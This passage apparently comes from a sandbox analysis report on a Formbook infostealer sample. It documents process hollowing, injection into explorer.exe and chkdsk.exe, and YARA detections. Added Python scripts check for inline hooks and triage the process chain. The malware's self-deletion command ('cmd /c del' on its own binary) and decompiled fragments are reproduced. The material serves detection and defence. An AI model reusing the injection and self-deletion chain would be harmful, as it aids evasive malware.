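The hook table above is the output of a prologue comparison: the first bytes of each export in the live process are checked against a clean copy of the DLL. The following is an added example of that check, not code from the report or from Joe Sandbox. Reading the bytes out of explorer.exe is left to the caller (ReadProcessMemory, a minidump, a memory-forensics plugin); the in-memory snapshots below are constructed from the six "New Data" bytes listed for explorer.exe!user32.dll, while the clean prologue, the export addresses and the untouched control function SendMessageW are placeholders, not values from the report.

```python
"""Inline-hook check over function prologues (added example, not part of the report)."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

MASK64 = (1 << 64) - 1


@dataclass
class HookFinding:
    function: str
    hooked: bool
    stub: str                  # decoded first instruction, or why it could not be decoded
    target: Optional[int]      # jump target when the stub encodes one


def classify_stub(func_addr: int, code: bytes) -> Tuple[str, Optional[int]]:
    """Decode the x86-64 stub shapes that hook engines usually write at a function entry."""
    if len(code) >= 5 and code[0] == 0xE9:                          # E9 rel32: jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (func_addr + 5 + rel) & MASK64
    if len(code) >= 6 and code[:2] == b"\xff\x25":                  # FF 25 disp32: jmp [rip+disp32]
        disp = struct.unpack_from("<i", code, 2)[0]
        return "jmp [rip+disp32]", (func_addr + 6 + disp) & MASK64
    if len(code) >= 12 and code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", code, 2)[0]
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:      # 68 imm32 C3: push imm32; ret
        return "push imm32; ret", struct.unpack_from("<I", code, 1)[0]
    return "prologue rewritten, first instruction is not a recognised jump stub", None


def check_hooks(exports: Dict[str, int], in_memory: Dict[str, bytes],
                clean: Dict[str, bytes]) -> List[HookFinding]:
    """Flag every export whose leading bytes in memory differ from the clean copy."""
    findings: List[HookFinding] = []
    for name, addr in exports.items():
        mem, disk = in_memory[name], clean[name]
        n = min(len(mem), len(disk))
        if mem[:n] == disk[:n]:
            findings.append(HookFinding(name, False, "unmodified", None))
            continue
        stub, target = classify_stub(addr, mem)
        findings.append(HookFinding(name, True, stub, target))
    return findings


# Constructed from the report: the "New Data" bytes of the hooked user32.dll exports in explorer.exe.
REPORT_NEW_DATA = {
    "PeekMessageA": bytes.fromhex("488bb8844eed"),
    "PeekMessageW": bytes.fromhex("488bb88cceed"),
    "GetMessageW":  bytes.fromhex("488bb88cceed"),
    "GetMessageA":  bytes.fromhex("488bb8844eed"),
}
# Placeholders (assumptions, not report data): a generic x64 prologue standing in for the
# on-disk bytes, made-up export addresses, and one untouched control export.
CLEAN_PROLOGUE = bytes.fromhex("48895c2408")          # mov [rsp+8], rbx
FAKE_EXPORTS = {name: 0x7FF8_1000_0000 + 0x100 * i for i, name in enumerate(REPORT_NEW_DATA)}
FAKE_EXPORTS["SendMessageW"] = 0x7FF8_1000_1000


def run_report_check() -> List[HookFinding]:
    """Run the comparison over the constructed snapshots."""
    in_memory = dict(REPORT_NEW_DATA, SendMessageW=CLEAN_PROLOGUE)
    clean = {name: CLEAN_PROLOGUE for name in FAKE_EXPORTS}
    return check_hooks(FAKE_EXPORTS, in_memory, clean)


if __name__ == "__main__":
    for f in run_report_check():
        tgt = f"-> {f.target:#x}" if f.target is not None else ""
        print(f"{f.function:14} hooked={f.hooked!s:5} {f.stub} {tgt}")
```

The report's bytes do not decode as any of the usual jump stubs, so a detector that only scans entry points for E9/FF 25 patterns would miss these hooks; the byte diff against a known-good copy is what catches them. When the clean copy comes from disk rather than from a second clean process, apply the loader's relocations first or mask relocation fixups, or the comparison will flag every export with an absolute address in its first bytes.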

                                    System Behavior

                                    General

                                    Start time:14:27:10
                                    Start date:13/10/2021
                                    Path:C:\Users\user\Desktop\document de commande.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\document de commande.exe'
                                    Imagebase:0x220000
                                    File size:566272 bytes
                                    MD5 hash:1823DCE627D29F5D4985501267F7AD9F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:14:27:18
                                    Start date:13/10/2021
                                    Path:C:\Users\user\Desktop\document de commande.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\document de commande.exe
                                    Imagebase:0xfc0000
                                    File size:566272 bytes
                                    MD5 hash:1823DCE627D29F5D4985501267F7AD9F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:14:27:19
                                    Start date:13/10/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff6fee60000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:14:27:49
                                    Start date:13/10/2021
                                    Path:C:\Windows\SysWOW64\chkdsk.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                    Imagebase:0xf0000
                                    File size:23040 bytes
                                    MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    General

                                    Start time:14:27:53
                                    Start date:13/10/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\document de commande.exe'
                                    Imagebase:0x11d0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:14:27:54
                                    Start date:13/10/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff724c50000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
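The process list above is the chain a detection engineer wants to recognise in endpoint telemetry: the sample re-launches its own image, a bare SysWOW64 utility (chkdsk.exe) appears under explorer.exe, and cmd.exe deletes the original binary. The following triage script is an added example, not part of the report or of the Formbook sample. Its events are constructed from the report's process list; the PIDs and the parent links (ppid) are assumptions, since the report gives start times and command lines but no PIDs, and the command lines are written out in full where the report shows only the arguments.

```python
"""Triage process-creation events for the chain seen in this report (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: Optional[int]      # None: parent not observed (long-running process such as explorer.exe)
    image: str               # full path of the executed image
    cmdline: str


_DEL_RE = re.compile(r"""\bdel\s+(?P<q>['"]?)(?P<path>[^'"]+)(?P=q)\s*$""", re.IGNORECASE)


def _strip_quotes(s: str) -> str:
    return s.strip().strip("'\"")


def has_no_arguments(ev: ProcEvent) -> bool:
    """True when the command line is only the image path with nothing after it."""
    return _strip_quotes(ev.cmdline).lower() == ev.image.lower()


def triage(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) for every event matching one of the three patterns."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    executed_images = {e.image.lower() for e in events}
    findings: List[Tuple[str, int, str]] = []
    for ev in events:
        parent = by_pid.get(ev.ppid) if ev.ppid is not None else None
        # 1. A process re-launching its own image with a bare command line: the pattern of the
        #    second "document de commande.exe" instance, the target of the process hollowing.
        if parent and parent.image.lower() == ev.image.lower() and has_no_arguments(ev):
            findings.append(("self_spawn", ev.pid,
                             f"{ev.image} re-executed by its own image (pid {parent.pid})"))
        # 2. explorer.exe starting a 32-bit system utility with no arguments at all. A chkdsk
        #    run by a user or a scheduled task carries a volume argument.
        if (parent and parent.image.lower().endswith("\\explorer.exe")
                and ev.image.lower().startswith("c:\\windows\\syswow64\\")
                and has_no_arguments(ev)):
            findings.append(("bare_syswow64_child_of_explorer", ev.pid,
                             f"{ev.image} started by explorer.exe with no arguments"))
        # 3. cmd /c del of a binary that itself executed in this session: self-deletion.
        m = _DEL_RE.search(ev.cmdline) if ev.image.lower().endswith("\\cmd.exe") else None
        if m and m.group("path").lower() in executed_images:
            findings.append(("deletes_executed_binary", ev.pid, f"cmd.exe deletes {m.group('path')}"))
    return findings


# Constructed events mirroring the report's process list. PIDs and ppids are assumptions.
CONSTRUCTED_EVENTS = [
    ProcEvent(1000, None, r"C:\Users\user\Desktop\document de commande.exe",
              r"'C:\Users\user\Desktop\document de commande.exe'"),
    ProcEvent(1003, 1000, r"C:\Users\user\Desktop\document de commande.exe",
              r"C:\Users\user\Desktop\document de commande.exe"),
    ProcEvent(1004, None, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    ProcEvent(1009, 1004, r"C:\Windows\SysWOW64\chkdsk.exe", r"C:\Windows\SysWOW64\chkdsk.exe"),
    ProcEvent(1010, 1009, r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\document de commande.exe'"),
    ProcEvent(1011, 1010, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # Benign control (constructed): an explorer-launched chkdsk with a volume argument is not flagged.
    ProcEvent(1012, 1004, r"C:\Windows\SysWOW64\chkdsk.exe", r"C:\Windows\SysWOW64\chkdsk.exe C:"),
]


if __name__ == "__main__":
    for rule, pid, detail in triage(CONSTRUCTED_EVENTS):
        print(f"[{rule}] pid {pid}: {detail}")
```

Rule 3 keys on "a binary that executed in this session" rather than on an ancestor's image, because in this chain the deletion is issued from the injected chkdsk.exe, not from the sample's own process tree; the original file is no longer an ancestor of cmd.exe by the time it is deleted. Rule 2 depends on real parent PIDs from the sensor; a parent reconstructed from start times alone will attribute the injected chkdsk.exe to explorer.exe correctly only because the injection target is explorer.exe itself.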

                                    Disassembly

                                    Code Analysis


                                      Executed Functions

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.686324887.0000000006AF0000.00000040.00000001.sdmp, Offset: 06AF0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 74781a28e5ece32f1f820d6e201f8acc9980d08962f162c3ad73979ea42e39dc
                                      • Instruction ID: 89f08914402cf98bc4de8be2182f6f600fcdc4a445014963fb1685f8f0b4898b
                                      • Opcode Fuzzy Hash: 74781a28e5ece32f1f820d6e201f8acc9980d08962f162c3ad73979ea42e39dc
                                      • Instruction Fuzzy Hash: 0C6109B0D5022ECFEB64DFA5C844BE9B7B2AF99304F1085E9D118A7241E7741AC5CF52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 06AF154D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.686324887.0000000006AF0000.00000040.00000001.sdmp, Offset: 06AF0000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: f547129d40ca668705cedc8e760af1f05e030e878a06dbc8f79f9183a8d5151d
                                      • Instruction ID: 55380a4eeb05bb5edc344ef76f94c27e59dcee8bf464ae77270b4677e3ea0e7f
                                      • Opcode Fuzzy Hash: f547129d40ca668705cedc8e760af1f05e030e878a06dbc8f79f9183a8d5151d
                                      • Instruction Fuzzy Hash: 3D1103B5900349DFCB10DFA9D885BDEBFF8EB48320F14845AE559A7600C778A984CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 06AF154D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.686324887.0000000006AF0000.00000040.00000001.sdmp, Offset: 06AF0000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 8eab6d6921de500ff6e4ab66eb71201a7cc5cb90a54b80095dfdd74f5656e955
                                      • Instruction ID: 622bed3bb8a341eb338b6fa56be63869c351347cee753a421f52c550bd397d4b
                                      • Opcode Fuzzy Hash: 8eab6d6921de500ff6e4ab66eb71201a7cc5cb90a54b80095dfdd74f5656e955
                                      • Instruction Fuzzy Hash: FD11E2B5800349DFDB10DF99D885BDEBBF8EB48324F14841AE959A7600C778A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680958114.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42b137fab451aabfbe08c00fc71a01c825582a475881e05274c7c5b272063ed0
                                      • Instruction ID: 4e835ba28ca79167be6c0775ee653480743d5db3f9561a066ba4fe560d9f7036
                                      • Opcode Fuzzy Hash: 42b137fab451aabfbe08c00fc71a01c825582a475881e05274c7c5b272063ed0
                                      • Instruction Fuzzy Hash: 702137B2504248DFDB02DF14D9C4F36BF66FB88328F25C569EA090B646C336D846DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.681076718.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5df8e5f7f6b0e11d874314ed3f75d9d192d546216729a62490ffbc93a937f4c0
                                      • Instruction ID: b5f10cb3aba0dd41a50f42a3eeb0c5029f69eedc1e9278e8239997e91f0dfe8f
                                      • Opcode Fuzzy Hash: 5df8e5f7f6b0e11d874314ed3f75d9d192d546216729a62490ffbc93a937f4c0
                                      • Instruction Fuzzy Hash: 4A21F571544244DFDB24EF24D9C4B26BB65FB84324F24C569D8494B286C73ADC47CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.681076718.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6d0da8d862545e5926776ec4da4081020212a159991389d9f0be2df559f8dc3
                                      • Instruction ID: 752eb512465805fa52bfc1b2372feedbd56fed813fa78a8ffbda51a89db25ef7
                                      • Opcode Fuzzy Hash: a6d0da8d862545e5926776ec4da4081020212a159991389d9f0be2df559f8dc3
                                      • Instruction Fuzzy Hash: EC2107B1944244EFDB11EF54D9C0B26BBA5FB84324F24C66DD8094B286C73ADC46CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680958114.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                      • Instruction ID: 6e2bdb52de113bdc9b7963d43ff06bad82fa6f2f1045f9e78bbf9b593aa698ac
                                      • Opcode Fuzzy Hash: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                      • Instruction Fuzzy Hash: 7611E676804284DFCF12CF14D5C4B26BF72FB85324F24C6A9D9490B656C336D85ACBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.681076718.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                      • Instruction ID: 8234d549afda7e7f91f83182715b8cafb49af60965c6330fd018cf4cbfd8b1bd
                                      • Opcode Fuzzy Hash: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                      • Instruction Fuzzy Hash: 0C119D75944280DFDB11DF14D5C4B15FBB1FB84324F28C6ADD8494B696C33AD84ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.681076718.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                      • Instruction ID: c2e5cd44bacfae2d80a786c311583bdf4aec31f3ccb20d2e780c4baa8e4b7fd4
                                      • Opcode Fuzzy Hash: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                      • Instruction Fuzzy Hash: 2011D075544280DFDB11DF14D5C4B15FB71FB44324F24C6A9D8494B696C33AD84ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680958114.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ae3a91c9e41b199a21b330f394b479a5d2dce3c7acc980e97158b887d71fd8c6
                                      • Instruction ID: dbc4041eae7192947b9a612963b074930d136b381cc9e684ced2bec6c3ff280e
                                      • Opcode Fuzzy Hash: ae3a91c9e41b199a21b330f394b479a5d2dce3c7acc980e97158b887d71fd8c6
                                      • Instruction Fuzzy Hash: D70147710087889AE7126E25CC88B72FB9CEF41338F19851AEF050F646C7799C48CAB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680958114.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fa2ff0d6f8ee6b22dfb8da0761ee7b19c92fd3c26dd932d682def90e3f565f44
                                      • Instruction ID: 41d0b8d1623c53b10509d6e9be34822a91ac097f3ed152ba349b3df4e774b3d6
                                      • Opcode Fuzzy Hash: fa2ff0d6f8ee6b22dfb8da0761ee7b19c92fd3c26dd932d682def90e3f565f44
                                      • Instruction Fuzzy Hash: C2F06271404748AFE7119E15DC88B62FBA8EB45734F18C45AEE085F786C3799C48CAB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680704229.0000000000222000.00000002.00020000.sdmp, Offset: 00220000, based on PE: true
• Associated: 00000000.00000002.680694335.0000000000220000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 55bf6ef78872b6171bb1d2180afd52579a81ba445c56d2af89bc6f7a20ae55a6
                                      • Instruction ID: 9ec65e34447b3052433f3e3634adb81c00dc733eec7317bb88849ca00f82763c
                                      • Opcode Fuzzy Hash: 55bf6ef78872b6171bb1d2180afd52579a81ba445c56d2af89bc6f7a20ae55a6
                                      • Instruction Fuzzy Hash: DE530E6144F7D16FC7138BB86CB16E27FB1AE5321471E45C7D4C08F0A3E2285AAAD762
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.686324887.0000000006AF0000.00000040.00000001.sdmp, Offset: 06AF0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: !
                                      • API String ID: 0-2657877971
                                      • Opcode ID: 990bb95d7bac3067cdf97f5417c2af1b85c2ac609ebde1f9849b384a45fa6941
                                      • Instruction ID: a00fc2fe03ee318af2f019b1f8eb35bf9878b0a8e75eee44ee083ad15d868fa2
                                      • Opcode Fuzzy Hash: 990bb95d7bac3067cdf97f5417c2af1b85c2ac609ebde1f9849b384a45fa6941
                                      • Instruction Fuzzy Hash: 4F110474D15228CFDB64DFA4C865BE8F7B1AB4A305F0084E5E60DA7252C3B09AC6CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E002266FF(void* __eax, void* __edx, void* __esi) {
                                      
                                      				 *((intOrPtr*)(__esi + __eax)) =  *((intOrPtr*)(__esi + __eax)) + __eax;
                                      			}



                                      0x00226701

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680704229.0000000000222000.00000002.00020000.sdmp, Offset: 00220000, based on PE: true
• Associated: 00000000.00000002.680694335.0000000000220000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a65b71bbc967a1245ac80fe38a4689f98907614a38b78bf8a59d9aef405ef06f
                                      • Instruction ID: ab38330c8b4e3e3fdf2be118313c821f9f1b2ab524d62e614281a328c3014e12
                                      • Opcode Fuzzy Hash: a65b71bbc967a1245ac80fe38a4689f98907614a38b78bf8a59d9aef405ef06f
                                      • Instruction Fuzzy Hash: A902CC6258E3D16FC7238B705CB96927FB09E5321471E49EBC4C2CF0A3D258195AD7A3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      APIs
                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1JA$rMA$rMA
                                      • API String ID: 2738559852-782607585
                                      • Opcode ID: 571895879dee8461ac67ce286c4e5f0c1a859a7358de4b3622705bd20ceeeafb
                                      • Instruction ID: 6df61201d9433d8778168a83831c0736fcc7cf66abb1aeaa7c2dc064d6b57340
                                      • Opcode Fuzzy Hash: 571895879dee8461ac67ce286c4e5f0c1a859a7358de4b3622705bd20ceeeafb
                                      • Instruction Fuzzy Hash: ACF0F4B2200108AFCB14DF89CC80EEB77ADEF8C754F168248FA1D97241D630E8118BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                      				void* _t18;
                                      				void* _t27;
                                      				intOrPtr* _t28;
                                      
                                      				_t13 = _a4;
                                      				_t28 = _a4 + 0xc48;
                                      				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                      				_t4 =  &_a40; // 0x414a31
                                      				_t6 =  &_a32; // 0x414d72
                                      				_t12 =  &_a8; // 0x414d72
                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                      				return _t18;
                                      			}






                                      0x0041a413
                                      0x0041a41f
                                      0x0041a427
                                      0x0041a42c
                                      0x0041a432
                                      0x0041a44d
                                      0x0041a455
                                      0x0041a459

                                      APIs
                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1JA$rMA$rMA
                                      • API String ID: 2738559852-782607585
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
                                      				char* _v8;
                                      				struct _EXCEPTION_RECORD _v12;
                                      				struct _OBJDIR_INFORMATION _v16;
                                      				char _v536;
                                      				void* _t15;
                                      				struct _OBJDIR_INFORMATION _t17;
                                      				struct _OBJDIR_INFORMATION _t18;
                                      				void* _t30;
                                      				void* _t31;
                                      				void* _t32;
                                      
                                      				_t24 = _a8;
                                      				_v8 =  &_v536;
